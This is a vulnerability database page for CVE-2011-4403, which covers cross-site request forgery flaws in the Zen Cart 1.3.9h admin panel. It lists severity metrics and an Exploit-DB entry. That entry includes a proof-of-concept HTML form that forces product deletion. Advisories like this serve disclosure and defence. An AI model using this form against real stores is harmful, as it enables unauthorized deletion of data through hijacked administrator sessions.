CVE-2011-4403 : Detail

CVE-2011-4403

Cross-Site Request Forgery - CSRF
A01-Broken Access Control
0.39%V4
Network
2015-04-24
12h00 +00:00
2015-04-24
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple cross-site request forgery (CSRF) vulnerabilities in Zen Cart 1.3.9h allow remote attackers to hijack the authentication of administrators for requests that (1) delete a product via a delete_product_confirm action to product.php or (2) disable a product via a setflag action to categories.php.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-352 Cross-Site Request Forgery (CSRF)
The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5.8 AV:N/AC:M/Au:N/C:N/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 36688

Publication date : 2012-02-09 23h00 +00:00
Author : DisK0nn3cT
EDB Verified : Yes

source: https://www.securityfocus.com/bid/51968/info Zen Cart is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible. Zen Cart 1.3.9h is vulnerable; other versions may be affected. <form name="products" action=" http://www.example.com/path_to_admin/product.php?action=delete_product_confirm"; method="post"> <label for="securityToken">Security Token</label><br/><input type="text" name="securityToken" value="Can be anything�" /><br/><br/> <label for="products_id">Products ID</label><br/><input type="text" name="products_id" value="329"><br/><br/> <label for="product_categories[]">Products Category</label><br/><input type="text" value="48" name="product_categories[]"><br/><br/> <input type="submit" border="0" alt="Delete" value=" Delete Product"> </form>

Products Mentioned

Configuraton 0

Zen-cart>>Zen_cart >> Version 1.3.9h

References

http://seclists.org/fulldisclosure/2012/Feb/171
Tags : mailing-list, x_refsource_FULLDISC
http://osvdb.org/79137
Tags : vdb-entry, x_refsource_OSVDB